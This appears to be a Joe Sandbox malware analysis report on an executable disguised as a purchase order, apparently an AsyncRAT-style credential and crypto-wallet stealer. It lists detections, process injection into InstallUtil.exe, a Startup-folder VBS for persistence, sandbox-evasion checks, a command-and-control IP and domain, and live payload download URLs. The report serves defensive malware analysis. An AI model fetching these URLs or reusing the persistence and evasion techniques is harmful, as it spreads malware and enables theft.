Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-12202432_ACD_Group.pif.exe

Overview

General Information

Sample name:PO-12202432_ACD_Group.pif.exe
Analysis ID:1586913
MD5:95bec6594e293a42f4abb049ea7e81db
SHA1:36ece8150f0619fc81bbf92bd840cad252bf1aea
SHA256:43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
Tags:exeuser-lowmal3
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
AI detected suspicious sample
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • PO-12202432_ACD_Group.pif.exe (PID: 3668 cmdline: "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
    • InstallUtil.exe (PID: 5008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsNestedFamANDAssem.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
      • InstallUtil.exe (PID: 5488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2380281455.0000000004803000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2165084237.00000000066B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.IsNestedFamANDAssem.exe.4803b08.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.PO-12202432_ACD_Group.pif.exe.66b0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.PO-12202432_ACD_Group.pif.exe.3e609a0.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7056, ProcessName: wscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7056, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, ProcessId: 3668, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T18:57:13.558600+010020355951Domain Observed Used for C2 Detected193.187.91.21850787192.168.2.549710TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: PO-12202432_ACD_Group.pif.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeAvira: detection malicious, Label: HEUR/AGEN.1308638
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeReversingLabs: Detection: 68%
                  Multi AV Scanner detection for submitted file
                  Source: PO-12202432_ACD_Group.pif.exeReversingLabs: Detection: 68%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: PO-12202432_ACD_Group.pif.exeJoe Sandbox ML: detected
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 067DE693h0_2_067DE318
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 067DE693h0_2_067DE497
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 067DE693h0_2_067DE308
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06EAE693h5_2_06EAE318
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06EAE693h5_2_06EAE497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06EAE693h5_2_06EAE308

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.2.5:49710
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: pureeratee.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 193.187.91.218:50787
                  Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: www.chirreeirl.com
                  Source: global trafficDNS traffic detected: DNS query: pureeratee.duckdns.org
                  Source: InstallUtil.exe, 00000002.00000002.4465370067.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: InstallUtil.exe, 00000002.00000002.4475159585.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com
                  Source: PO-12202432_ACD_Group.pif.exe, IsNestedFamANDAssem.exe.0.drString found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49712 version: TLS 1.2

                  System Summary

                  barindex
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C1C88 NtProtectVirtualMemory,0_2_067C1C88
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C4B38 NtResumeThread,0_2_067C4B38
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C1C81 NtProtectVirtualMemory,0_2_067C1C81
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C4B30 NtResumeThread,0_2_067C4B30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CDFEC0 NtProtectVirtualMemory,5_2_06CDFEC0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CDFEB8 NtProtectVirtualMemory,5_2_06CDFEB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CDFF89 NtProtectVirtualMemory,5_2_06CDFF89
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E931D8 NtResumeThread,5_2_06E931D8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E931D0 NtResumeThread,5_2_06E931D0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0106A0410_2_0106A041
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0106A0670_2_0106A067
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_010628E00_2_010628E0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_010628F00_2_010628F0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_01062E780_2_01062E78
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_05AFE6A00_2_05AFE6A0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_05AFE6850_2_05AFE685
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_05AF30C80_2_05AF30C8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_05AF30D80_2_05AF30D8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065AF6280_2_065AF628
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A4C780_2_065A4C78
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A70380_2_065A7038
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A89AB0_2_065A89AB
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065ACF180_2_065ACF18
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065ACF080_2_065ACF08
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A4C680_2_065A4C68
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A14200_2_065A1420
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066074900_2_06607490
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06603B0F0_2_06603B0F
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066005A90_2_066005A9
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066005B80_2_066005B8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066051280_2_06605128
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06603E470_2_06603E47
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A00400_2_066A0040
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A74B00_2_066A74B0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A00060_2_066A0006
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A74A00_2_066A74A0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A61600_2_066A6160
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A61170_2_066A6117
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A79C10_2_066A79C1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A61A80_2_066A61A8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A61980_2_066A6198
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5A540_2_067C5A54
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5E950_2_067C5E95
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5A960_2_067C5A96
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5A930_2_067C5A93
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5DF40_2_067C5DF4
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C59D80_2_067C59D8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C59C80_2_067C59C8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067D3E580_2_067D3E58
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067D97F00_2_067D97F0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067D97DF0_2_067D97DF
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067D9C250_2_067D9C25
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067DBCB80_2_067DBCB8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067DBCA80_2_067DBCA8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067DE4970_2_067DE497
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06AAE2B00_2_06AAE2B0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06AADF000_2_06AADF00
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06A900060_2_06A90006
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06A900400_2_06A90040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E31A402_2_00E31A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E31A402_2_00E31A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E31A302_2_00E31A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E34B402_2_00E34B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E34B3D2_2_00E34B3D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E31E202_2_00E31E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E31E302_2_00E31E30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0166A0415_2_0166A041
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0166A0675_2_0166A067
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_016628E05_2_016628E0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_016628F05_2_016628F0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_01662E785_2_01662E78
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0609C9B85_2_0609C9B8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_060930C85_2_060930C8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_060930D85_2_060930D8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0609C9A85_2_0609C9A8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C7F6285_2_06C7F628
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C74C785_2_06C74C78
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C770385_2_06C77038
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C789AB5_2_06C789AB
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C7CF185_2_06C7CF18
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C74C685_2_06C74C68
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C714205_2_06C71420
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD3B205_2_06CD3B20
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD05AF5_2_06CD05AF
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD05B85_2_06CD05B8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD51285_2_06CD5128
